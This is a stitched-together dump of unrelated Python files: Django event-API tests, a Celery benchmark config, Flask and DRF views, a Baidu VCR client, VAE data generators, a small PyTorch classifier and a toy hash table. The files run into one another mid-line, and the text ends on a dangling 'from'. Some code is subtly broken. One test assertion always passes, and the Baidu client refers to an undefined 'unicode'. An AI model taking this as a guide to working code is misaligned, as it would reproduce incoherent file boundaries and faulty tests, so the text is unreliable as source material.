minimal_event_dict.pop('location') minimal_event_dict.pop('keywords') minimal_event_dict['publication_status'] = 'draft' response = create_with_post(api_client, minimal_event_dict) assert_event_data_is_equal(minimal_event_dict, response.data) # the drafts should not be visible to unauthorized users api_client.logout() resp2 = api_client.get(response.data['@id']) assert '@id' not in resp2.data @pytest.mark.django_db def test__cannot_create_a_draft_event_without_a_name(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('name') minimal_event_dict['publication_status'] = 'draft' response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'name' in response.data @pytest.mark.django_db def test__cannot_publish_an_event_without_location(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('location') response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'location' in response.data @pytest.mark.django_db def test__cannot_publish_an_event_without_keywords(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict.pop('keywords') response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'keywords' in response.data @pytest.mark.django_db def test__create_a_complex_event_with_post(api_client, complex_event_dict, user): api_client.force_authenticate(user=user) response = create_with_post(api_client, complex_event_dict) assert_event_data_is_equal(complex_event_dict, response.data) @pytest.mark.django_db def test__autopopulated_fields_at_create( api_client, minimal_event_dict, user, user2, other_data_source, organization, organization2): # create an event api_client.force_authenticate(user=user) response = create_with_post(api_client, minimal_event_dict) event = Event.objects.get(id=response.data['id']) assert event.created_by == user assert event.last_modified_by == user assert event.created_time is not None assert event.last_modified_time is not None assert event.data_source.id == settings.SYSTEM_DATA_SOURCE_ID assert event.publisher == 
organization # the following values may not be posted @pytest.mark.django_db @pytest.mark.parametrize("non_permitted_input,non_permitted_response", [ ({'id': 'not_allowed:1'}, 400), # may not fake id ({'data_source': 'theotherdatasourceid'}, 400), # may not fake data source ({'publisher': 'test_organization2'}, 400), # may not fake organization ]) def test__non_editable_fields_at_create(api_client, minimal_event_dict, list_url, user, non_permitted_input, non_permitted_response): api_client.force_authenticate(user) minimal_event_dict.update(non_permitted_input) response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == non_permitted_response if non_permitted_response >= 400: # check that there is an error message for the corresponding field assert list(non_permitted_input)[0] in response.data # location field is used for JSONLDRelatedField tests @pytest.mark.django_db @pytest.mark.parametrize("ld_input,ld_expected", [ ({'location': {'@id': '/v1/place/test%20location/'}}, 201), ({'location': {'@id': ''}}, 400), # field required ({'location': {'foo': 'bar'}}, 400), # incorrect json ({'location': '/v1/place/test%20location/'}, 400), # incorrect json ({'location': 7}, 400), # incorrect json ({'location': None}, 400), # cannot be null ({}, 400), # field required ]) def test__jsonld_related_field(api_client, minimal_event_dict, list_url, place, user, ld_input, ld_expected): api_client.force_authenticate(user) del minimal_event_dict['location'] minimal_event_dict.update(ld_input) response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == ld_expected if ld_expected >= 400: # check that there is a error message for location field assert 'location' in response.data @pytest.mark.django_db def test_start_time_and_end_time_validation(api_client, minimal_event_dict, user): api_client.force_authenticate(user) minimal_event_dict['start_time'] = timezone.now() - timedelta(days=2) minimal_event_dict['end_time'] = timezone.now() - timedelta(days=1) with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 400 assert 'Start time cannot be in the past.' in response.data['start_time'] assert 'End time cannot be in the past.' 
in response.data['end_time'] @pytest.mark.django_db def test_description_and_short_description_required_in_name_languages(api_client, minimal_event_dict, user): api_client.force_authenticate(user) minimal_event_dict['name'] = {'fi': 'nimi', 'sv': 'namn'} minimal_event_dict['short_description'] = {'fi': 'lyhyt kuvaus'} minimal_event_dict['description'] = {'sv': 'description in swedish'} with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') # there should be only one error assert len(response.data['short_description']) == 1 assert len(response.data['description']) == 1 assert (force_text(response.data['short_description']['sv']) == 'This field must be specified before an event is published.') assert (force_text(response.data['description']['fi']) == 'This field must be specified before an event is published.') @pytest.mark.django_db def test_short_description_cannot_exceed_160_chars(api_client, minimal_event_dict, user): api_client.force_authenticate(user) minimal_event_dict['short_description']['fi'] = 'x' * 161 with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 400 assert (force_text(response.data['short_description']['fi'] == 'Short description length must be 160 characters or less')) @pytest.mark.django_db @pytest.mark.parametrize("offers, expected", [ ([{'is_free': True}], 201), ([{'is_free': False, 'price': {'fi': 4}}], 201), ([{'description': 'foo'}, {'is_free': True}], 201), ([{'is_free': False}], 400) ]) def test_price_info_required(api_client, minimal_event_dict, user, offers, expected): api_client.force_authenticate(user) minimal_event_dict['offers'] = offers with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == expected if expected == 400: assert force_text(response.data['offers'][0]) == 'Price info must be specified before an event is published.' @pytest.mark.parametrize('name, is_valid', [ ({'sv': 'namn'}, True), ({'foo': 'bar'}, False), ({}, False), (None, False), ]) @pytest.mark.django_db def test_name_required_in_some_language(api_client, minimal_event_dict, user, name, is_valid): api_client.force_authenticate(user) minimal_event_dict['name'] = name with translation.override('en'): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') if is_valid: assert response.status_code == 201 else: assert response.status_code == 400 if not is_valid: assert force_text(response.data['name'][0]) == 'The name must be specified.' 
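# --- Illustrative sketch, not part of the test suite above ---
# The event-creation tests above assert that an event whose end_time precedes its
# start_time is rejected with HTTP 400 and an error keyed on 'end_time'. A minimal
# serializer-level check that produces that error shape might look like the
# following; the serializer and field names are assumptions for illustration only,
# and the snippet assumes Django plus djangorestframework are installed.
from django.conf import settings

if not settings.configured:
    settings.configure(USE_TZ=True)  # minimal settings so the sketch runs standalone

from rest_framework import serializers


class IllustrativeEventSerializer(serializers.Serializer):
    start_time = serializers.DateTimeField()
    end_time = serializers.DateTimeField()

    def validate(self, data):
        # Mirror the 400 + 'end_time' error shape exercised by
        # test__cannot_create_an_event_ending_before_start_time.
        if data['end_time'] < data['start_time']:
            raise serializers.ValidationError(
                {'end_time': 'End time must not be earlier than start time.'})
        return data


if __name__ == '__main__':
    bad = IllustrativeEventSerializer(data={
        'start_time': '2021-01-02T10:00:00Z',
        'end_time': '2021-01-01T10:00:00Z',
    })
    print(bad.is_valid(), dict(bad.errors))  # -> False, errors keyed on 'end_time'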
""" 主要用用来测试相同基准下的celery和此框架的性能对比。 """ import time import celery from celery import platforms from function_scheduling_distributed_framework import frame_config from test_frame.my_patch_frame_config import do_patch_frame_config do_patch_frame_config() platforms.C_FORCE_ROOT = True # celery_app = celery.Celery('test_frame.test_celery.test_celery_app') celery_app = celery.Celery() class Config2: broker_url = f'redis://:{frame_config.REDIS_PASSWORD}@{frame_config.REDIS_HOST}:{frame_config.REDIS_PORT}/10' # 使用redis result_backend = f'redis://:{frame_config.REDIS_PASSWORD}@{frame_config.REDIS_HOST}:{frame_config.REDIS_PORT}/14' # 使用redis broker_connection_max_retries = 150 # 默认是100 # result_serializer = 'json' task_default_queue = 'default' # 默认celery # task_default_rate_limit = '101/s' task_default_routing_key = 'default' # task_eager_propagates = False # 默认disable task_ignore_result = False # task_serializer = 'json' # task_time_limit = 70 # task_soft_time_limit = 60 # worker_concurrency = 32 # worker_enable_remote_control = True # worker_prefetch_multiplier = 3 # 默认4 # worker_redirect_stdouts_level = 'WARNING' # worker_timer_precision = 0.1 # 默认1秒 task_routes = { '求和啊': {"queue": "queue_add2", }, 'sub啊': {"queue": 'queue_sub2'}, 'f1': {"queue": 'queue_f1'}, } # task_reject_on_worker_lost = True #配置这两项可以随意停止 # task_acks_late = True celery_app.config_from_object(Config2) @celery_app.task(name='求和啊', ) # REMIND rate_limit在这里写,也可以在调用时候写test_task.apply_async(args=(1,2),expires=3) def add(a, b): print(f'消费此消息 {a} + {b} 中。。。。。') time.sleep(100, ) # 模拟做某事需要阻塞10秒种,必须用并发绕过此阻塞。 print(f'计算 {a} + {b} 得到的结果是 {a + b}') return a + b @celery_app.task(name='sub啊') def sub(x, y): print(f'消费此消息 {x} - {y} 中。。。。。') time.sleep(100, ) # 模拟做某事需要阻塞10秒种,必须用并发绕过此阻塞。 print(f'计算 {x} - {y} 得到的结果是 {x - y}') return x - y print(sub) if __name__ == '__main__': """ Pool implementation: prefork (default), eventlet, gevent or solo. """ """ celery_app.worker_main( argv=['worker', '--pool=prefork', '--concurrency=100', '-n', 'worker1@%h', '--loglevel=debug', '--queues=queue_add', '--detach','--logfile=/pythonlogs/celery_add.log']) """ # queue_add,queue_sub,queue_f1 celery_app.worker_main( argv=['worker', '--pool=gevent', '--concurrency=5', '-n', 'worker1@%h', '--loglevel=debug', '--queues=queue_f1,queue_add2,queue_sub2', '--detach', ]) learn_docker_app/api/respond.py import platform from flask import request from flask_restx import fields, Namespace, Resource respond_namespace = Namespace( 'respond', description='Provides operations that generate a simple response.' ) copy_cat_model = respond_namespace.model('Respond', { 'response': fields.String(description='The string provided.') }) @respond_namespace.route('') class Copycat(Resource): @respond_namespace.marshal_with(copy_cat_model) def get(self, string: str): return { 'response': string, } platform_model = respond_namespace.model('Host', { 'hostname_or_ip': fields.String( description='The computer’s network name (may not be fully qualified!) or its ip address.' \ 'An empty string is returned if the value cannot be determined.' ), 'system': fields.String( description='Returns the system/OS name, such as "Linux", "Darwin", ' \ '"Java", "Windows". An empty string is returned if the' \ 'value cannot be determined.' 
) }) hostname_model = respond_namespace.model('Hostname', { 'host': fields.Nested(platform_model, description='Data concerning the API server.'), 'client': fields.Nested(platform_model, description='Data concerning the requesting client.'), }) @respond_namespace.route('hostname') class Hostname(Resource): @respond_namespace.marshal_with(hostname_model) def get(self): return { 'host': { 'hostname_or_ip': platform.node(), 'system': platform.system(), }, 'client': { 'hostname_or_ip': request.remote_addr, 'system': request.user_agent.platform, }, } from .external import ExternalDownloader class WgetDownloader(ExternalDownloader): """Downloader that uses the command line program wget.""" program = 'wget' args = ['-qO-'] import sys import re import datetime import asyncio import numpy as np import bspump import bspump.file import bspump.common import bspump.trigger import bspump.analyzer ### # Download test data file from: # http://opendata.praha.eu/dataset/parkovani_pr/resource/601ca22a-2c53-49e7-b396-26cc64cedc3d # and save as `TSK_data_2016_2018.csv` ### class ProgressBarProcessor(bspump.Processor): Spinner = [ "> ", ">> ", ">>> ", ">>>>", " >>>", " >>", " >", " ", ] def __init__(self, app, pipeline, id=None, config=None): super().__init__(app=app, pipeline=pipeline, id=id, config=config) self.Counter = 0 self.Time = app.Loop.time() self.StartTime = self.Time def process(self, context, event): self.Counter += 1 if (self.Counter % 10000) == 0: t = self.Pipeline.Loop.time() sys.stdout.write('\r [ {} | {} events | {:0.1f} sec | {} eps ] \r'.format( self.Spinner[(self.Counter // 10000) % len(self.Spinner)], self.nice_format(self.Counter), t - self.StartTime, self.nice_format(10000 / (t - self.Time)) )) sys.stdout.flush() self.Time = t return event @staticmethod def nice_format(v): if v > 1000000000: return "{:0.1f}G".format(v / 1000000000) if v > 1000000: return "{:0.1f}M".format(v / 1000000) if v > 1000: return "{:0.1f}k".format(v / 1000) return "{}".format(v) ### class MyTransformator(bspump.common.MappingTransformator): def build(self, app): self.TimestampRG = re.compile(r"^([0-9]{4})\-([0-9]{2})\-([0-9]{2}) ([0-9]{2}):([0-9]{2}):([0-9]{2})$") return { 'Datum_a_cas': self.timestamp, 'Vjezd': lambda k, v: (k, int(v.replace(' ', ''))), 'Vyjezd': lambda k, v: (k, int(v.replace(' ', ''))), 'Obsazenost': lambda k, v: (k, int(v.replace(' ', ''))), 'Volna_mista': lambda k, v: (k, int(v.replace(' ', ''))), 'Kapacita': lambda k, v: (k, int(v.replace(' ', ''))), } def timestamp(self, key, value): rgm = self.TimestampRG.match(value) year, month, day, hour, minute, second = (int(x) for x in rgm.groups()) dt = datetime.datetime(year=year, month=month, day=day, hour=hour, minute=minute, second=second) return '@timestamp', dt ### class MyTimeWindowAnalyzer(bspump.analyzer.TimeWindowAnalyzer): def __init__(self, app, pipeline, id=None, config=None): start_time=datetime.datetime(year=2016, month=1, day=1, hour=0, minute=0, second=0).timestamp() super().__init__(app=app, pipeline=pipeline, start_time=start_time, clock_driven=False, id=id, config=config) self.TimeWindow.add_row("P+R Zličín 1") self.TimeWindow.add_row("P+R Rajská zahrada") self.MaxTimestamp = 0.0 # simple checker if event contains time related fields def predicate(self, context, event): if '@timestamp' not in event: return False return True def evaluate(self, context, event): ts = event["@timestamp"].timestamp() if self.MaxTimestamp < ts: self.MaxTimestamp = ts self.TimeWindow.advance(self.MaxTimestamp) # find the column in timewindow matrix to 
fit in column = self.TimeWindow.get_column(ts) if column is None: return row = self.TimeWindow.get_row_index(event["Parkoviste"]) if row is None: return self.TimeWindow.Array[row, column] += 1 async def analyze(self): if self.TimeWindow.Array.shape[0] == 0: return # selecting part of matrix specified in configuration x = self.TimeWindow.Array[:, :] # if any of time slots is 0 if np.any(x == 0): print("Alarm!") ### class SamplePipeline(bspump.Pipeline): def __init__(self, app, pipeline_id): super().__init__(app, pipeline_id) self.build( # Download the CSV file "TSK_data_2016_2018.csv" from # http://opendata.praha.eu/dataset/parkovani_pr/resource/601ca22a-2c53-49e7-b396-26cc64cedc3d # and put it to the "examples" folder bspump.file.FileCSVSource(app, self, config={ 'path': './TSK_data_2016_2018.csv', 'post': 'noop', 'delimiter': ';', 'encoding': 'utf-8', }).on(bspump.trigger.PubSubTrigger(app, "go!", pubsub=self.PubSub)), ProgressBarProcessor(app,self), MyTransformator(app, self), MyTimeWindowAnalyzer(app, self), bspump.common.NullSink(app, self), ) self.PubSub.subscribe("bspump.pipeline.cycle_end!", self._on_cycle_end) async def _on_cycle_end(self, event_name, pipeline): await asyncio.sleep(1) svc = app.get_service("bspump.PumpService") svc.App.stop() ### if __name__ == '__main__': app = bspump.BSPumpApplication() svc = app.get_service("bspump.PumpService") # Construct and register Pipeline pl = SamplePipeline(app, 'SamplePipeline') svc.add_pipeline(pl) pl.PubSub.publish("go!") app.run() twa = pl.locate_processor('MyTimeWindowAnalyzer') print("TWA:", twa) if twa is not None: print(twa.TimeWindow) from rest_framework import viewsets from rest_framework.decorators import action from rest_framework.pagination import PageNumberPagination from django_filters.rest_framework import DjangoFilterBackend from rest_framework.response import Response from rest_framework import status from perm.models import PerMisson from perm.filters import PerMissonFilter from application.models import Application from users.models import tGroup from django.contrib.auth import get_user_model from perm.serializers import PermListSerializer, \ PermDetailSerializer, \ PermCreateSerializer, \ PermListSimpleSerializer, \ PermUserSerializer, \ PermAppSerializer, \ PermtGroupSerializer, \ PermUpdateSerializer User = get_user_model() # 权限分页 class PermissonPagination(PageNumberPagination): page_size = 10 page_size_query_param = 'page_size' page_query_param = 'page' max_page_size = 100 # 权限视图 class PermissonViewSet(viewsets.ModelViewSet): queryset = PerMisson.objects.all() serializer_class = PermDetailSerializer pagination_class = PermissonPagination filter_backends = (DjangoFilterBackend,) filter_class = PerMissonFilter def get_serializer_class(self): if self.action == 'list': return PermListSerializer if self.action == 'create': return PermCreateSerializer if self.action == 'update': return PermUpdateSerializer return PermDetailSerializer @action(detail=False, methods=['get'], name="get all permisson", url_path="getall") def get_perm_all(self, request, pk=None): permsqs = PerMisson.objects.all() serializer = PermListSimpleSerializer(permsqs, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=False, methods=['get'], name="get all users", url_path="getusers") def get_all_users(self, request, pk=None): users = User.objects.all() serializer = PermUserSerializer(users, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=False, methods=['get'], name="get all 
apps", url_path="getapps") def get_all_apps(self, request, pk=None): apps = Application.objects.all() serializer = PermAppSerializer(apps, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=False, methods=['get'], name="get all groups", url_path="getgroups") def get_all_tgroups(self, request, pk=None): tgroups = tGroup.objects.all() serializer = PermtGroupSerializer(tgroups, many=True) return Response(serializer.data, status=status.HTTP_200_OK) @action(detail=True, methods=['get'], name='group outside user', url_path="getusers_out") def get_outside_user(self, request, pk=None): users = User.objects.exclude(granted_by_permissions__id=pk) serializer = PermUserSerializer(users, many=True) return Response( serializer.data, status=status.HTTP_200_OK ) @action(detail=True, methods=['get'], name='group outside apps', url_path="getapps_out") def get_outside_apps(self, request, pk=None): apps = Application.objects.exclude(granted_by_permissions__id=pk) serializer = PermAppSerializer(apps, many=True) return Response( serializer.data, status=status.HTTP_200_OK ) @action(detail=True, methods=['get'], name='group outside groups', url_path="getgroups_out") def get_outside_tgroup(self, request, pk=None): groups = tGroup.objects.exclude(granted_by_permissions__id=pk) serializer = PermtGroupSerializer(groups, many=True) return Response( serializer.data, status=status.HTTP_200_OK ) datasets/download/download_dataset.py1-10 import boto3 import botocore import constants import utils as ut import argparse if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('name', type=str, help = "Name of dataset to be downloaded") parser.add_argument('data_dir', type=str, help = "Diretory to download dataset to") args = parser.parse_args() ut.download_and_unzip(args.name, args.data_dir) 0 # Copyright 2017 Baidu, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file # except in compliance with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed under the # License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific language governing permissions # and limitations under the License. """ This module provides a client class for VCR. """ import copy import json import logging from builtins import str from builtins import bytes from baidubce.auth import bce_v1_signer from baidubce.bce_base_client import BceBaseClient from baidubce.http import bce_http_client from baidubce.http import handler from baidubce.http import http_methods from baidubce.utils import required _logger = logging.getLogger(__name__) class VcrClient(BceBaseClient): """ vcr client """ def __init__(self, config=None): BceBaseClient.__init__(self, config) @required(source=(bytes, str)) def put_media(self, source, auth=None, description=None, preset=None, notification=None, config=None): """ Check a media. 
:param source: media source :type source: string or unicode :param auth: media source auth param :type auth: string or unicode :param description: media description :type description: string or unicode :param preset: analyze preset name :type preset: string or unicode :param notification: notification name :type notification: string or unicode :return: **Http Response** """ body = { 'source': source } if auth is not None: body['auth'] = auth if description is not None: body['description'] = description if preset is not None: body['preset'] = preset if notification is not None: body['notification'] = notification return self._send_request(http_methods.PUT, b'/v1/media', body=json.dumps(body), config=config) @required(source=(bytes, str)) def get_media(self, source, config=None): """ :param source: media source :type source: string or unicode :return: **Http Response** """ return self._send_request(http_methods.GET, b'/v1/media', params={b'source': source}, config=config) @required(source=(bytes, str)) def put_stream(self, source, preset=None, notification=None, config=None): """ :param source: media source :type source: string or unicode :param preset: analyze preset name :type preset: string or unicode :param notification: notification name :type notification: string or unicode :return: **Http Response** """ body = { 'source': source } if preset is not None: body['preset'] = preset if notification is not None: body['notification'] = notification return self._send_request(http_methods.POST, b'/v1/stream', body=json.dumps(body), config=config) @required(source=(bytes, str)) def get_stream(self, source, start_time=None, end_time=None, config=None): """ :param source: media source :type source: string or unicode :param start_time: None :type start_time: string or unicode :param end_time: start_time should be earlier than end_time :type end_time: string or unicode :return: **Http Response** """ params = {b'source': source} if start_time is not None: params[b'startTime'] = start_time if end_time is not None: params[b'endTime'] = end_time return self._send_request(http_methods.GET, b'/v1/stream', params=params, config=config) @required(source=(bytes, str)) def put_image(self, source, preset=None, config=None): """ :param source: media source :type source: string or unicode :param preset: analyze preset name :type preset: string or unicode :return: **Http Response** """ body = { 'source': source } if preset is not None: body['preset'] = preset return self._send_request(http_methods.PUT, b'/v1/image', body=json.dumps(body), config=config) @required(text=(bytes, str)) def put_text(self, text, preset=None, config=None): """ :param text: string :type text: text to check :param preset: analyze preset name :type preset: string or unicode :return: **Http Response** """ body = { 'text': text } if preset is not None: body['preset'] = preset return self._send_request(http_methods.PUT, b'/v1/text', body=json.dumps(body), config=config) @required(lib=(str, unicode), brief=(str, unicode), image=(str, unicode)) def add_face_image(self, lib, brief, image, config=None): """ :param lib: private face lib :param brief: private face brief :param image: private face image :return: **Http Response** """ body = { 'brief': brief, 'image': image } return self._send_request(http_methods.POST, '/v1/face/lib/%s' % lib, body=json.dumps(body), config=config) @required(lib=(str, unicode), brief=(str, unicode)) def del_face_brief(self, lib, brief, config=None): """ :param lib: private face lib :param brief: private face brief 
:return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.DELETE, '/v1/face/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode), brief=(str, unicode), image=(str, unicode)) def del_face_image(self, lib, brief, image, config=None): """ :param lib: private face lib :param brief: private face brief :param image: private face image :return: **Http Response** """ params = { 'brief': brief, 'image': image } return self._send_request(http_methods.DELETE, '/v1/face/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode)) def get_face_lib(self, lib, config=None): """ :param lib: private face lib :return: **Http Response** """ return self._send_request(http_methods.GET, '/v1/face/lib/%s' % lib, config=config) @required(lib=(str, unicode), brief=(str, unicode)) def get_face_brief(self, lib, brief, config=None): """ :param lib: private face lib :param brief: private face brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.GET, '/v1/face/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode), brief=(str, unicode), image=(str, unicode)) def add_logo_image(self, lib, brief, image, config=None): """ :param lib: private logo lib :param brief: private logo brief :param image: private logo image :return: **Http Response** """ body = { 'brief': brief, 'image': image } return self._send_request(http_methods.POST, '/v1/logo/lib/%s' % lib, body=json.dumps(body), config=config) @required(lib=(str, unicode), brief=(str, unicode)) def del_logo_brief(self, lib, brief, config=None): """ :param lib: private logo lib :param brief: private logo brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.DELETE, '/v1/logo/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode), image=(str, unicode)) def del_logo_image(self, lib, image, config=None): """ :param lib: private logo lib :param image: private logo image :return: **Http Response** """ params = { 'image': image } return self._send_request(http_methods.DELETE, '/v1/logo/lib/%s' % lib, params=params, config=config) @required(lib=(str, unicode)) def get_logo_lib(self, lib, config=None): """ :param lib: private logo lib :return: **Http Response** """ return self._send_request(http_methods.GET, '/v1/logo/lib/%s' % lib, config=config) @required(lib=(str, unicode), brief=(str, unicode)) def get_logo_brief(self, lib, brief, config=None): """ :param lib: private logo lib :param brief: private logo brief :return: **Http Response** """ params = { 'brief': brief } return self._send_request(http_methods.GET, '/v1/logo/lib/%s' % lib, params=params, config=config) @staticmethod def _merge_config(self, config): if config is None: return self.config else: new_config = copy.copy(self.config) new_config.merge_non_none_values(config) return new_config def _send_request( self, http_method, path, body=None, headers=None, params=None, config=None, body_parser=None): config = self._merge_config(self, config) if body_parser is None: body_parser = handler.parse_json return bce_http_client.send_request( config, bce_v1_signer.sign, [handler.parse_error, body_parser], http_method, path, body, headers, params) import os import sys import numpy as np import pandas as pd from scipy import sparse from tensorflow import keras class ContentVaeDataGenerator(keras.utils.Sequence): ''' Generate the training and validation data for the content part of vae model. 
''' def __init__(self, data_root, batch_size, batch_num=None, prev_layers=[], noise_type=None, joint=False, shuffle=True): feature_path = os.path.join(data_root, "item_features.npz") self.features = sparse.load_npz(feature_path) self.num_items = self.features.shape[0] self.batch_size = batch_size self.batch_num = batch_num if prev_layers != []: self.apply_prev_layers(self.features, prev_layers) ### Whether or not, or add which type of noise. self.noise_type = noise_type ### Shuffle the items if necessary. self.indexes = np.arange(self.num_items) self.shuffle = shuffle if self.shuffle: self.on_epoch_end() ### Train jointly with the collaborative part self.joint = joint def __len__(self): ''' The total number of batches. ''' if self.batch_num is None: batch_num = self.num_items//self.batch_size if self.num_items%self.batch_size != 0: batch_num+=1 else: batch_num = self.batch_num return batch_num def __getitem__(self, i): ''' Return the batch indexed by i. ''' batch_idxes = self.indexes[i*self.batch_size:(i+1)*self.batch_size] batch_target = self.features[batch_idxes].toarray() if self.noise_type is None: batch_input = batch_target else: batch_input = self.add_noise(self.noise_type, batch_target) if self.joint: batch_input = [batch_input, self.z_b[batch_idxes]] batch_target = batch_target return batch_input, batch_target def apply_prev_layers(self, features, prev_layers): ''' Apply the previous pretrained layers on the feature ''' batch_num = self.__len__() ori_features = features.toarray() for prev_layer in prev_layers: new_dims = prev_layer.outputs[0].shape.as_list()[-1] new_features = np.zeros((self.num_items, new_dims), dtype=np.float32) for i in range(batch_num): new_features[i*self.batch_size:(i+1)*self.batch_size] = prev_layer( ori_features[i*self.batch_size:(i+1)*self.batch_size] ) ori_features = new_features self.features = sparse.csr_matrix(new_features) def on_epoch_end(self): ''' Shuffle the item index after each epoch. ''' if self.shuffle: np.random.shuffle(self.indexes) def add_noise(self, noise_type, contents): ''' corrupt the inputs and train as SDAE style. ''' if 'Mask' in noise_type: frac = float(noise_type.split('-')[1]) masked_contents = np.copy(contents) for item in masked_contents: zero_pos = np.random.choice(len(item), int(round( frac*len(item))), replace=False) item[zero_pos] = 0 return masked_contents else: raise NotImplementedError def update_previous_bstep(self, z_b): self.z_b = z_b @property def feature_dim(self): return self.features.shape[-1] class CollaborativeVAEDataGenerator(keras.utils.Sequence): def __init__(self, data_root, phase, batch_size, batch_num=None, ragged_x=False, reuse=True, joint=True, shuffle=True): ''' Generate the training and validation data for the collaborative part of vbae model. 
''' assert phase in ["train", "val", "test"], "Phase must be [train, val, test]" self.phase = phase self.batch_size = batch_size self.batch_num = batch_num self.ragged_x = ragged_x self.data_root = data_root self._load_data(data_root, reuse=reuse, ragged_x=ragged_x) self.shuffle = shuffle if self.shuffle: self.on_epoch_end() ### Train jointly with the content part self.joint = joint def _load_data(self, data_root, reuse, ragged_x): ### Load the dataset meta_table = pd.read_csv(os.path.join(data_root, "meta.csv")) self.num_items = meta_table["num_items"][0] if self.phase == "train": obs_path = os.path.join(data_root, "train.csv") obs_records = pd.read_csv(obs_path) obs_group = obs_records.groupby("uid") unk_group = obs_group else: obs_path = os.path.join(data_root, "{}_obs.csv".format(self.phase)) unk_path = os.path.join(data_root, "{}_unk.csv".format(self.phase)) obs_records = pd.read_csv(obs_path) unk_records = pd.read_csv(unk_path) obs_group = obs_records.groupby("uid") unk_group = unk_records.groupby("uid") ### IDs and corresponding indexes self.user_ids = np.array(pd.unique(obs_records["uid"]), dtype=np.int32) self.indexes = np.arange(len(self.user_ids)) self.num_users = len(self.user_ids) X_path = os.path.join(data_root, "{}_X.npz".format(self.phase)) Y_path = os.path.join(data_root, "{}_Y.npz".format(self.phase)) if reuse and os.path.exists(X_path) and os.path.exists(Y_path): self.X = sparse.load_npz(X_path) self.Y = sparse.load_npz(Y_path) else: ### Represent the whole dataset with a huge sparse matrix rows_X, cols_X, rows_Y, cols_Y = [], [], [], [] for i, user_id in enumerate(self.user_ids): try: group_X = obs_group.get_group(user_id) group_Y = unk_group.get_group(user_id) except: import pdb pdb.set_trace() rows_X += [i]*len(group_X); cols_X += list(group_X["vid"]-1) rows_Y += [i]*len(group_Y); cols_Y += list(group_Y["vid"]-1) self.X = sparse.csr_matrix((np.ones_like(rows_X, dtype=np.float32), (rows_X, cols_X)), dtype='float32', shape=(self.num_users, self.num_items)) self.Y = sparse.csr_matrix((np.ones_like(rows_Y, dtype=np.float32), (rows_Y, cols_Y)), dtype='float32', shape=(self.num_users, self.num_items)) if reuse: sparse.save_npz(X_path, self.X) sparse.save_npz(Y_path, self.Y) if ragged_x: self.X = self.X.tolil().rows def on_epoch_end(self): if self.shuffle: np.random.shuffle(self.indexes) def __len__(self): if self.batch_num is None: batch_num = self.num_users//self.batch_size if self.num_users%self.batch_size != 0: batch_num+=1 else: batch_num = self.batch_num return batch_num def __getitem__(self, i): batch_idxes = self.indexes[i*self.batch_size:(i+1)*self.batch_size] batch_X = self.X[batch_idxes] if self.ragged_x \ else self.X[batch_idxes].toarray() batch_Y = self.Y[batch_idxes].toarray() return (batch_X, batch_Y) def update_previous_tstep(self, z_t): self.z_t = z_t @property def target_shape(self): return self._target_shape if __name__ == '__main__': passimport torch.nn as nn class CancerClassifier(nn.Module): '''유방암 분류기 신경망 클래스''' def __init__(self, input_size, output_size): self.input_size = input_size self.output_size = output_size super().__init__() self.layers = nn.Sequential( nn.Linear(input_size, 22), nn.LeakyReLU(), #nn.BatchNorm1d(22), nn.Linear(22, 15), nn.LeakyReLU(), #nn.BatchNorm1d(15), nn.Linear(15, 10), nn.LeakyReLU(), #nn.BatchNorm1d(10), nn.Linear(10, 5), nn.LeakyReLU(), #nn.BatchNorm1d(5), nn.Linear(5, 4), nn.LeakyReLU(), #nn.BatchNorm1d(4), nn.Linear(4, 3), nn.LeakyReLU(), #nn.BatchNorm1d(3), nn.Linear(3, output_size), nn.Sigmoid(), ) def forward(self, 
x): return self.layers(x) WEEKS/CD_Sata-Structures/_MISC/misc-examples/myhash2.py class HashTableEntry: def __init__(self, key, value): self.key = key self.value = value def __repr__(self): return f"HashTableEntry({repr(self.key)},{repr(self.value)})" # lets refactor some code hash_table = [None] * 8 # 8 slots, all initiailized to None def my_hash(s): sb = s.encode() # Get the UTF-8 bytes for the string sum = 0 for b in sb: sum += b sum &= 0xFFFFFFFF # clamp to 32 bits return sum # hash the index def hash_index(key): h = my_hash(key) return h % len(hash_table) # put def put(key, val): i = hash_index(key) # while the hash_table[i] != None # then increment index and try again if hash_table[i] != None: print(f"Collision! Overwriting {repr(hash_table[i])}") hash_table[i] = HashTableEntry(key, val) # get def get(key): i = hash_index(key) entry = hash_table[i] if entry == None: return None # while the entry.key != key # then increment index and try again return entry.value # delete def delete(key): i = hash_index(key) hash_table[i] = None if __name__ == "__main__": # put("Hello", "Hello Value") # put("World", "World Value") # print(f"{hash_table}\n") # put("foo", "foo value") # "foo" hashes to same index as "Hello" # # AKA "foo collides with Hello" # print(f"\n{hash_table}\n"); # v = get("Hello") # print(f'Hello value is: {v}') # Should be "Hello Value", but gives "foo value" pass from 